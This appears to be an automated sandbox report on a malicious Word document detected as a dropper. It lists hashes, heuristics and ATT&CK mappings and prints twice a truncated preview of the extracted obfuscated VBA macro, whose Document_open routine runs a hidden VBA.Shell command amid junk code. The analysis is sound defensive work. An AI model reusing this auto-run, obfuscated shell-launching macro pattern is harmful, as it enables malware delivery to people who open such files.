Office (OLE) malware analysis — malicious · 4a5056ae2d45efbf

MALICIOUS

Office (OLE)

198.5 KB Created: 2018-07-20 19:19:00 Authoring application: Microsoft Office Word First seen: 2018-09-04

MD5: c10cdb2cb1d11217a74040d2e501ab80 SHA-1: d64d4ef2ea73a311fdd456bdef58969c71df8707 SHA-256: 4a5056ae2d45efbf5605a0838abdc27d74de39130e17e8001cdb3c8b79f53351

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is identified as malicious by ClamAV and contains VBA macros. A critical heuristic firing indicates the presence of a Shell() call within the VBA code, suggesting the execution of external commands. This is commonly used to download and execute further malicious payloads.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6617066-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6617066-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 44979 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	44979 bytes
SHA-256: `ebf976869c5631f906a42248d54b4782691fa035f75f40cd638e49e90b1f41b4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "voDCrmvuuH" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function itCfCjY() On Error Resume Next If VtTZPv > klIAkj Then jdjSM = zjGvW * ZZCMFc End If If WNMDUa > lQwIM Then MwlEh = fAPQq * sZkYww End If If fOKKkv > wJfji Then jlBTuV = rlHLoD * NPnTZ End If If KXpQZ > iFUICc Then NRiimC = CuGwW * VzjWLG End If If pqDRfR > zQiHpJ Then JBvRi = MsHzWI * BXNRCN End If If nHbsOn > HVoVXv Then okljBG = lmYCaV * hYCXE End If End Function Private Function bzYPIcQYN() On Error Resume Next If LMGwoJ > MWjENO Then zYLNS = iwuCAm * NMnPt End If If JiBkDQ > uaMOpt Then XuChV = tJQDI * HOLMu End If If oskpWj > CTtQoV Then JdolX = nQnBEI * uBJJw End If If oIslU > FNDZLK Then wzzbn = RDYEjl * NuBJk End If If htRwOY > tXcLq Then sHqzwb = NkzOz * CJhjNS End If End Function Private Function amnPtQsXN() On Error Resume Next If GfLNQ > mUzafi Then ARGSSh = pUPYzQ * lYpjX End If If oioWBz > hOhpVW Then hhPlW = itvrTw * jrKtBn End If If lqpiG > dNJwU Then LWqjiz = mVqinh * PZQrnH End If If dCwtd > mdJTFr Then sDjKXW = ouICBJ * DwSIMp End If If BVBUj > NtVMoW Then PksaTE = umzCE * LpEoo End If End Function Private Function jYiJjSpuMRX() On Error Resume Next If HHquF > qXLAd Then iBhidh = pPFdWR * iiRbz End If If jnPUJ > GiqPG Then NwXzqw = pkzbj * fnEwM End If If timWG > jmQnOA Then BwKtH = aZhhn * BQAZD End If If lArpDK > ITpTl Then JKRsk = JAErM * wNEif End If If cGFctq > kdjTk Then HwFbOO = XXcjLi * dTCmd End If If nwEAq > vYlwQ Then BQwLTi = CtLtbz * tDPrj End If If ZRYvKG > djtDn Then cDhiC = ahJcCc * cbrIt End If If iArOhJ > szLcF Then zKwkZ = iADBd * duWMG End If End Function Private Function vkCKSPAOTKj() On Error Resume Next If aqYMTX > RUnQLc Then IRFbfQ = nuPHO * kpcnk End If If zSCRco > bHBvT Then dDYtid = wiASs * olkVcf End If If KJXAAz > OSDvB Then mAiRLw = bDoID * LiiasR End If If CDPOtT > RcjGIf Then AfCwnv = GVPwA * pjrKid End If If CMzhKG > fNNBj Then LcTQA = DnPSkZ * AYqlZQ End If If MtWWAv > LktQv Then uhTQvp = ziwql * bJptCi End If If kmuEj > EVuiTN Then XQYjz = jhnwJE * SObsz End If End Function Private Sub Document_open() On Error Resume Next If ukZfSD > kiHhwB Then dPMFQ = vGqoL * CcXXXT End If If XcWiYJ > Mdfvff Then FWwoz = lLzNXo * wjXKi End If If TUwRWw > AcrjZ Then MUTLFS = tMdIG * ujcFUN End If If KfIWA > fpHMI Then cvTmN = cGLqLw * fIKZZQ End If If iBfbsX > FEOUK Then SqJizU = FMUTLa * tVQiw End If VBA.Shell "" + jtjnPdIiW + iqFNsPza + CVar("C") + tlTfABMKjOYFk + jSBumcUMDE + pmnZZkj + fAzZdOYq + DrttzRK + mFHAv + ZPjMFP + bMaiCpDc + QwuPNEwK + toKVLZBGbrmJMR + ZwwjShMQRCJjn, 0 If INTQIo > OLnMS Then rBCOh = FYuRb * jmoTo End If If cMVzV > iICEF Then bYQIcU = JzjrfM * tDIPRS End If If KwrUf > unviM Then ksAuhP = XYsVp * tibznn End If End Sub Private Function MIzFFFdrzKnb() On Error Resume Next If czTjli > jphRPK Then mfNRF = hbBUz * SMGVZk End If If bDKZwC > SJRwdn Then UisoW = TihOMs * opprjG End If If pYcDP > BBCQh Then FDSMK = rAVXfC * BvIfoQ End If If dzInN > LiLFjY Then AaZmzu = CzRtaV * WtVOz End If If WPMDr > jpzzz Then MBKcad = WzVvNE * rcUaM End If If jioQb > FuTNp Then EKGJO = iUvjH * PCnzKn End If If kDrwpz > mHoiw Then IFzGJG = CAwzh * LNcUIj End If End Function Private Func ... (truncated)

SHA-256: ebf976869c5631f906a42248d54b4782691fa035f75f40cd638e49e90b1f41b4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "voDCrmvuuH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function itCfCjY()
On Error Resume Next
   If VtTZPv > klIAkj Then
      jdjSM = zjGvW * ZZCMFc
   End If
   If WNMDUa > lQwIM Then
      MwlEh = fAPQq * sZkYww
   End If
   If fOKKkv > wJfji Then
      jlBTuV = rlHLoD * NPnTZ
   End If
   If KXpQZ > iFUICc Then
      NRiimC = CuGwW * VzjWLG
   End If
   If pqDRfR > zQiHpJ Then
      JBvRi = MsHzWI * BXNRCN
   End If
   If nHbsOn > HVoVXv Then
      okljBG = lmYCaV * hYCXE
   End If
End Function
Private Function bzYPIcQYN()
On Error Resume Next
   If LMGwoJ > MWjENO Then
      zYLNS = iwuCAm * NMnPt
   End If
   If JiBkDQ > uaMOpt Then
      XuChV = tJQDI * HOLMu
   End If
   If oskpWj > CTtQoV Then
      JdolX = nQnBEI * uBJJw
   End If
   If oIslU > FNDZLK Then
      wzzbn = RDYEjl * NuBJk
   End If
   If htRwOY > tXcLq Then
      sHqzwb = NkzOz * CJhjNS
   End If
End Function
Private Function amnPtQsXN()
On Error Resume Next
   If GfLNQ > mUzafi Then
      ARGSSh = pUPYzQ * lYpjX
   End If
   If oioWBz > hOhpVW Then
      hhPlW = itvrTw * jrKtBn
   End If
   If lqpiG > dNJwU Then
      LWqjiz = mVqinh * PZQrnH
   End If
   If dCwtd > mdJTFr Then
      sDjKXW = ouICBJ * DwSIMp
   End If
   If BVBUj > NtVMoW Then
      PksaTE = umzCE * LpEoo
   End If
End Function
Private Function jYiJjSpuMRX()
On Error Resume Next
   If HHquF > qXLAd Then
      iBhidh = pPFdWR * iiRbz
   End If
   If jnPUJ > GiqPG Then
      NwXzqw = pkzbj * fnEwM
   End If
   If timWG > jmQnOA Then
      BwKtH = aZhhn * BQAZD
   End If
   If lArpDK > ITpTl Then
      JKRsk = JAErM * wNEif
   End If
   If cGFctq > kdjTk Then
      HwFbOO = XXcjLi * dTCmd
   End If
   If nwEAq > vYlwQ Then
      BQwLTi = CtLtbz * tDPrj
   End If
   If ZRYvKG > djtDn Then
      cDhiC = ahJcCc * cbrIt
   End If
   If iArOhJ > szLcF Then
      zKwkZ = iADBd * duWMG
   End If
End Function
Private Function vkCKSPAOTKj()
On Error Resume Next
   If aqYMTX > RUnQLc Then
      IRFbfQ = nuPHO * kpcnk
   End If
   If zSCRco > bHBvT Then
      dDYtid = wiASs * olkVcf
   End If
   If KJXAAz > OSDvB Then
      mAiRLw = bDoID * LiiasR
   End If
   If CDPOtT > RcjGIf Then
      AfCwnv = GVPwA * pjrKid
   End If
   If CMzhKG > fNNBj Then
      LcTQA = DnPSkZ * AYqlZQ
   End If
   If MtWWAv > LktQv Then
      uhTQvp = ziwql * bJptCi
   End If
   If kmuEj > EVuiTN Then
      XQYjz = jhnwJE * SObsz
   End If
End Function
Private Sub Document_open()
On Error Resume Next
   If ukZfSD > kiHhwB Then
      dPMFQ = vGqoL * CcXXXT
   End If
   If XcWiYJ > Mdfvff Then
      FWwoz = lLzNXo * wjXKi
   End If
   If TUwRWw > AcrjZ Then
      MUTLFS = tMdIG * ujcFUN
   End If
   If KfIWA > fpHMI Then
      cvTmN = cGLqLw * fIKZZQ
   End If
   If iBfbsX > FEOUK Then
      SqJizU = FMUTLa * tVQiw
   End If
VBA.Shell "" + jtjnPdIiW + iqFNsPza + CVar("C") + tlTfABMKjOYFk + jSBumcUMDE + pmnZZkj + fAzZdOYq + DrttzRK + mFHAv + ZPjMFP + bMaiCpDc + QwuPNEwK + toKVLZBGbrmJMR + ZwwjShMQRCJjn, 0
   If INTQIo > OLnMS Then
      rBCOh = FYuRb * jmoTo
   End If
   If cMVzV > iICEF Then
      bYQIcU = JzjrfM * tDIPRS
   End If
   If KwrUf > unviM Then
      ksAuhP = XYsVp * tibznn
   End If
End Sub
Private Function MIzFFFdrzKnb()
On Error Resume Next
   If czTjli > jphRPK Then
      mfNRF = hbBUz * SMGVZk
   End If
   If bDKZwC > SJRwdn Then
      UisoW = TihOMs * opprjG
   End If
   If pYcDP > BBCQh Then
      FDSMK = rAVXfC * BvIfoQ
   End If
   If dzInN > LiLFjY Then
      AaZmzu = CzRtaV * WtVOz
   End If
   If WPMDr > jpzzz Then
      MBKcad = WzVvNE * rcUaM
   End If
   If jioQb > FuTNp Then
      EKGJO = iUvjH * PCnzKn
   End If
   If kDrwpz > mHoiw Then
      IFzGJG = CAwzh * LNcUIj
   End If
End Function
Private Func
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.